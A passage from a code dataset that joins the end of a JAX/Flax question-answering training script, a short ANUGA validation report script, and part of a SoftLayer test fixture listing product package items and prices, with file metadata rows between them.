def write_train_metric(summary_writer, train_metrics, train_time, step):
summary_writer.scalar("train_time", train_time, step)
train_metrics = get_metrics(train_metrics)
for key, vals in train_metrics.items():
tag = f"train_{key}"
for i, val in enumerate(vals):
summary_writer.scalar(tag, val, step - len(vals) + i + 1)
def write_eval_metric(summary_writer, eval_metrics, step):
for metric_name, value in eval_metrics.items():
summary_writer.scalar(f"eval_{metric_name}", value, step)
num_epochs = int(training_args.num_train_epochs)
rng = jax.random.PRNGKey(training_args.seed)
dropout_rngs = jax.random.split(rng, jax.local_device_count())
train_batch_size = training_args.per_device_train_batch_size * jax.local_device_count()
eval_batch_size = training_args.per_device_eval_batch_size * jax.local_device_count()
# endregion
# region Load model
model = FlaxAutoModelForQuestionAnswering.from_pretrained(
model_args.model_name_or_path,
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
seed=training_args.seed,
dtype=getattr(jnp, model_args.dtype),
)
learning_rate_fn = create_learning_rate_fn(
len(train_dataset),
train_batch_size,
training_args.num_train_epochs,
training_args.warmup_steps,
training_args.learning_rate,
)
state = create_train_state(model, learning_rate_fn, num_labels=max_seq_length, training_args=training_args)
# endregion
# region Define train step functions
def train_step(
state: train_state.TrainState, batch: Dict[str, Array], dropout_rng: PRNGKey
) -> Tuple[train_state.TrainState, float]:
"""Trains model with an optimizer (both in `state`) on `batch`, returning a pair `(new_state, loss)`."""
dropout_rng, new_dropout_rng = jax.random.split(dropout_rng)
start_positions = batch.pop("start_positions")
end_positions = batch.pop("end_positions")
targets = (start_positions, end_positions)
def loss_fn(params):
logits = state.apply_fn(**batch, params=params, dropout_rng=dropout_rng, train=True)
loss = state.loss_fn(logits, targets)
return loss
grad_fn = jax.value_and_grad(loss_fn)
loss, grad = grad_fn(state.params)
grad = jax.lax.pmean(grad, "batch")
new_state = state.apply_gradients(grads=grad)
metrics = jax.lax.pmean({"loss": loss, "learning_rate": learning_rate_fn(state.step)}, axis_name="batch")
return new_state, metrics, new_dropout_rng
p_train_step = jax.pmap(train_step, axis_name="batch", donate_argnums=(0,))
# endregion
# region Define eval step functions
def eval_step(state, batch):
logits = state.apply_fn(**batch, params=state.params, train=False)
return state.logits_fn(logits)
p_eval_step = jax.pmap(eval_step, axis_name="batch")
# endregion
# region Define train and eval loop
logger.info(f"===== Starting training ({num_epochs} epochs) =====")
train_time = 0
# make sure weights are replicated on each device
state = replicate(state)
train_time = 0
step_per_epoch = len(train_dataset) // train_batch_size
total_steps = step_per_epoch * num_epochs
epochs = tqdm(range(num_epochs), desc=f"Epoch ... (1/{num_epochs})", position=0)
for epoch in epochs:
train_start = time.time()
train_metrics = []
# Create sampling rng
rng, input_rng = jax.random.split(rng)
# train
for step, batch in enumerate(
tqdm(
train_data_collator(input_rng, train_dataset, train_batch_size),
total=step_per_epoch,
desc="Training...",
position=1,
),
1,
):
state, train_metric, dropout_rngs = p_train_step(state, batch, dropout_rngs)
train_metrics.append(train_metric)
cur_step = epoch * step_per_epoch + step
if cur_step % training_args.logging_steps == 0 and cur_step > 0:
# Save metrics
train_metric = unreplicate(train_metric)
train_time += time.time() - train_start
if has_tensorboard and jax.process_index() == 0:
write_train_metric(summary_writer, train_metrics, train_time, cur_step)
epochs.write(
f"Step... ({cur_step}/{total_steps} | Training Loss: {train_metric['loss']}, Learning Rate: {train_metric['learning_rate']})"
)
train_metrics = []
if (
training_args.do_eval
and (cur_step % training_args.eval_steps == 0 or cur_step % step_per_epoch == 0)
and cur_step > 0
):
eval_metrics = {}
all_start_logits = []
all_end_logits = []
# evaluate
for batch in tqdm(
eval_data_collator(eval_dataset, eval_batch_size),
total=len(eval_dataset) // eval_batch_size,
desc="Evaluating ...",
position=2,
):
_ = batch.pop("example_id")
_ = batch.pop("offset_mapping")
predictions = p_eval_step(state, batch)
start_logits = np.array([pred for pred in chain(*predictions[0])])
end_logits = np.array([pred for pred in chain(*predictions[1])])
all_start_logits.append(start_logits)
all_end_logits.append(end_logits)
# evaluate also on leftover examples (not divisible by batch_size)
num_leftover_samples = len(eval_dataset) % eval_batch_size
# make sure leftover batch is evaluated on one device
if num_leftover_samples > 0 and jax.process_index() == 0:
# take leftover samples
batch = eval_dataset[-num_leftover_samples:]
batch = {k: np.array(v) for k, v in batch.items()}
_ = batch.pop("example_id")
_ = batch.pop("offset_mapping")
predictions = eval_step(unreplicate(state), batch)
start_logits = np.array([pred for pred in predictions[0]])
end_logits = np.array([pred for pred in predictions[1]])
all_start_logits.append(start_logits)
all_end_logits.append(end_logits)
max_len = max([x.shape[1] for x in all_start_logits]) # Get the max_length of the tensor
# concatenate the numpy array
start_logits_concat = create_and_fill_np_array(all_start_logits, eval_dataset, max_len)
end_logits_concat = create_and_fill_np_array(all_end_logits, eval_dataset, max_len)
# delete the list of numpy arrays
del all_start_logits
del all_end_logits
outputs_numpy = (start_logits_concat, end_logits_concat)
prediction = post_processing_function(eval_examples, eval_dataset, outputs_numpy)
eval_metrics = compute_metrics(prediction)
logger.info(f"Step... ({cur_step}/{total_steps} | Evaluation metrics: {eval_metrics})")
if has_tensorboard and jax.process_index() == 0:
write_eval_metric(summary_writer, eval_metrics, cur_step)
if (cur_step % training_args.save_steps == 0 and cur_step > 0) or (cur_step == total_steps):
# save checkpoint after each epoch and push checkpoint to the hub
if jax.process_index() == 0:
params = jax.device_get(unreplicate(state.params))
model.save_pretrained(training_args.output_dir, params=params)
tokenizer.save_pretrained(training_args.output_dir)
if training_args.push_to_hub:
repo.push_to_hub(commit_message=f"Saving weights and logs of step {cur_step}", blocking=False)
epochs.desc = f"Epoch ... {epoch + 1}/{num_epochs}"
# endregion
# Eval after training
if training_args.do_eval:
eval_metrics = {}
all_start_logits = []
all_end_logits = []
eva_loader = eval_data_collator(eval_dataset, eval_batch_size)
for batch in tqdm(eva_loader, total=len(eval_dataset) // eval_batch_size, desc="Evaluating ...", position=2):
_ = batch.pop("example_id")
_ = batch.pop("offset_mapping")
predictions = p_eval_step(state, batch)
start_logits = np.array([pred for pred in chain(*predictions[0])])
end_logits = np.array([pred for pred in chain(*predictions[1])])
all_start_logits.append(start_logits)
all_end_logits.append(end_logits)
# evaluate also on leftover examples (not divisible by batch_size)
num_leftover_samples = len(eval_dataset) % eval_batch_size
# make sure leftover batch is evaluated on one device
if num_leftover_samples > 0 and jax.process_index() == 0:
# take leftover samples
batch = eval_dataset[-num_leftover_samples:]
batch = {k: np.array(v) for k, v in batch.items()}
_ = batch.pop("example_id")
_ = batch.pop("offset_mapping")
predictions = eval_step(unreplicate(state), batch)
start_logits = np.array([pred for pred in predictions[0]])
end_logits = np.array([pred for pred in predictions[1]])
all_start_logits.append(start_logits)
all_end_logits.append(end_logits)
max_len = max([x.shape[1] for x in all_start_logits]) # Get the max_length of the tensor
# concatenate the numpy array
start_logits_concat = create_and_fill_np_array(all_start_logits, eval_dataset, max_len)
end_logits_concat = create_and_fill_np_array(all_end_logits, eval_dataset, max_len)
# delete the list of numpy arrays
del all_start_logits
del all_end_logits
outputs_numpy = (start_logits_concat, end_logits_concat)
prediction = post_processing_function(eval_examples, eval_dataset, outputs_numpy)
eval_metrics = compute_metrics(prediction)
if jax.process_index() == 0:
eval_metrics = {f"eval_{metric_name}": value for metric_name, value in eval_metrics.items()}
path = os.path.join(training_args.output_dir, "eval_results.json")
with open(path, "w") as f:
json.dump(eval_metrics, f, indent=4, sort_keys=True)
if __name__ == "__main__":
main()
| 45.132634 | 151 | 0.661029 |
02eb8dbd01a211cdc4a7ca0c1b0e62fcd129657f | 231 | py | Python | validation_tests/analytical_exact/mac_donald_short_channel/produce_results.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 136 | 2015-05-07T05:47:43.000Z | 2022-02-16T03:07:40.000Z | validation_tests/analytical_exact/mac_donald_short_channel/produce_results.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 184 | 2015-05-03T09:27:54.000Z | 2021-12-20T04:22:48.000Z | validation_tests/analytical_exact/mac_donald_short_channel/produce_results.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 70 | 2015-03-18T07:35:22.000Z | 2021-11-01T07:07:29.000Z | #--------------------------------
# import modules
#--------------------------------
import anuga
from anuga.validation_utilities import produce_report
args = anuga.get_args()
produce_report('numerical_MacDonald.py', args=args)
| 21 | 53 | 0.575758 |
c4c45985d6a4e4aa9d0f0cb13d69fde0187b424d | 71,767 | py | Python | SoftLayer/fixtures/SoftLayer_Product_Package.py | dvzrv/softlayer-python | 9a5f6c6981bcc370084537b4d1769383499ce90d | [
"MIT"
] | null | null | null | SoftLayer/fixtures/SoftLayer_Product_Package.py | dvzrv/softlayer-python | 9a5f6c6981bcc370084537b4d1769383499ce90d | [
"MIT"
] | null | null | null | SoftLayer/fixtures/SoftLayer_Product_Package.py | dvzrv/softlayer-python | 9a5f6c6981bcc370084537b4d1769383499ce90d | [
"MIT"
] | null | null | null | # pylint: skip-file
HARDWARE_ITEMS = [
{'attributes': [],
'capacity': '999',
'description': 'Unknown',
'itemCategory': {'categoryCode': 'unknown', 'id': 325},
'keyName': 'UNKNOWN',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1245172,
"locationGroupId": '',
'itemId': 935954,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '64',
'description': '1 IPv6 Address',
'itemCategory': {'categoryCode': 'pri_ipv6_addresses',
'id': 325},
'keyName': '1_IPV6_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
"locationGroupId": '',
'itemId': 4097,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}},
{'attributes': [],
'capacity': '1',
'description': '1 IP Address',
'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13},
'keyName': '1_IP_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 21,
"locationGroupId": '',
'itemId': 15,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS',
'id': 1014}],
'description': 'Unlimited SSL VPN Users',
'itemCategory': {'categoryCode': 'vpn_management', 'id': 31},
'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 420,
"locationGroupId": '',
'itemId': 309,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'description': 'Reboot / KVM over IP',
'itemCategory': {'categoryCode': 'remote_management',
'id': 46},
'keyName': 'REBOOT_KVM_OVER_IP',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 906,
"locationGroupId": '',
'itemId': 504,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'id': 22505,
"locationGroupId": '',
'itemId': 4481,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 98}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]}]
ENTERPRISE_PACKAGE = {
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 240,
'name': 'Endurance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_service_enterprise'},
'keyName': 'CODENAME_PRIME_STORAGE_SERVICE',
'prices': [
{
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 45058,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_file'},
'keyName': 'FILE_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 45108,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_block'},
'keyName': 'BLOCK_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 45098,
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '10_GB_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46160,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46170,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 45860,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46659,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45128,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46789,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45318,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '300'}
],
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'WRITEHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45088,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '200'}
],
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'READHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45078,
'locationGroupId': ''
}
]
}
]
}
PERFORMANCE_PACKAGE = {
'categories': [
{'categoryCode': 'performance_storage_iscsi'},
{'categoryCode': 'performance_storage_nfs'}
],
'id': 222,
'name': 'Performance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_iscsi'},
'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_iscsi'}
],
'id': 40672,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'performance_storage_nfs'},
'keyName': 'FILE_STORAGE_PERFORMANCE_NFS',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_nfs'}
],
'id': 40662,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40682,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 40742,
'locationGroupId': ''
}
]
}, {
'capacity': '800',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '800_IOPS_4',
'prices': [
{
'capacityRestrictionMaximum': '1000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 41562,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'keyName': '1000_IOPS',
'prices': [
{
'capacityRestrictionMaximum': '20',
'capacityRestrictionMinimum': '20',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 40882,
'locationGroupId': ''
}
]
}
]
}
SAAS_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 189443,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '999',
'capacityMinimum': '500',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '500_999_GBS',
'prices': [
{
'id': 189993,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB',
'prices': [
{
'id': 193433,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '12000',
'capacityMinimum': '1',
'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB',
'prices': [
{
'id': 194763,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '10000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '999',
'capacityRestrictionMinimum': '500',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190053,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': ''
}
]
}, {
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 193373,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': '',
'prices': [
{
'id': 194703,
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '100',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 191193,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193613,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 194943,
'locationGroupId': ''}]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '48000',
'capacityRestrictionMinimum': '1',
'capacityRestrictionType': 'IOPS',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 192033,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {
'categoryCode': 'performance_storage_replication'
},
'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 194693,
'locationGroupId': ''
}
]
}
]
}
SAAS_REST_PACKAGE = {
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'id': 759,
'name': 'Storage As A Service (StaaS)',
'items': [
{
'capacity': '0',
'keyName': '',
'prices': [
{
'id': 189433,
'categories': [
{'categoryCode': 'storage_as_a_service'}
],
'locationGroupId': None
}
]
}, {
'capacity': '20',
'keyName': '',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 193853,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '1999',
'capacityMinimum': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_1999_GBS',
'prices': [
{
'id': 190113,
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'locationGroupId': None
}
]
}, {
'capacity': '0',
'capacityMaximum': '20000',
'capacityMinimum': '100',
'keyName': '',
'itemCategory': {'categoryCode': 'performance_storage_iops'},
'prices': [
{
'capacityRestrictionMaximum': '1999',
'capacityRestrictionMinimum': '1000',
'capacityRestrictionType': 'STORAGE_SPACE',
'categories': [
{'categoryCode': 'performance_storage_iops'}
],
'id': 190173,
'locationGroupId': None
}
]
}, {
'capacity': '0',
'keyName': '',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 189453,
'locationGroupId': None
}
]
}
]
}
activePreset1 = {
'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID',
'id': 64,
'isActive': '1',
'keyName': 'S1270_8GB_2X1TBSATA_NORAID',
'name': 'S1270 8GB 2X1TBSATA NORAID',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
activePreset2 = {
'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10',
'id': 65,
'isActive': '1',
'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10',
'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10',
'packageId': 200,
'prices': [
{
"hourlyRecurringFee": "1.18",
"id": 165711,
"locationGroupId": '',
"recurringFee": "780",
}
]
}
getAllObjects = [{
'activePresets': [activePreset1],
'accountRestrictedActivePresets': [activePreset2],
'description': 'Bare Metal Server',
'firstOrderStepId': 1,
'id': 200,
'isActive': 1,
'items': HARDWARE_ITEMS,
'name': 'Bare Metal Server',
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'subDescription': 'Bare Metal Server',
'unitSize': 1,
"itemPrices": [
{
"hourlyRecurringFee": ".027",
"id": 205911,
"laborFee": "0",
"locationGroupId": 505,
"capacityRestrictionMaximum": "40",
"capacityRestrictionMinimum": "40",
"capacityRestrictionType": "CORE",
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
},
{
"hourlyRecurringFee": "0",
"id": 199467,
"laborFee": "0",
"locationGroupId": '',
"recurringFee": "0",
"item": {
"capacity": "0",
"description": "Load Balancer Bandwidth",
"id": 10051,
"keyName": "LOAD_BALANCER_BANDWIDTH",
}
},
{
"hourlyRecurringFee": ".028",
"id": 205913,
"laborFee": "0",
"locationGroupId": 507,
"item": {
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
}
}]
}]
getItems = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
},
{
'id': 1240,
'keyName': 'KeyName014',
'capacity': '4',
'units': 'PRIVATE_CORE',
'description': 'Computing Instance (Dedicated)',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1007,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 1250,
'keyName': 'KeyName015',
'capacity': '4',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 1144,
'locationGroupId': None,
'hourlyRecurringFee': 0.10,
'recurringFee': 0.10,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
'id': 112233,
'keyName': 'KeyName016',
'capacity': '55',
'units': 'CORE',
'description': 'Computing Instance',
'itemCategory': {'categoryCode': 'Computing Instance'},
'prices': [{'id': 332211,
'locationGroupId': 1,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 80,
'name': 'Computing Instance',
'categoryCode': 'guest_core'}]}],
},
{
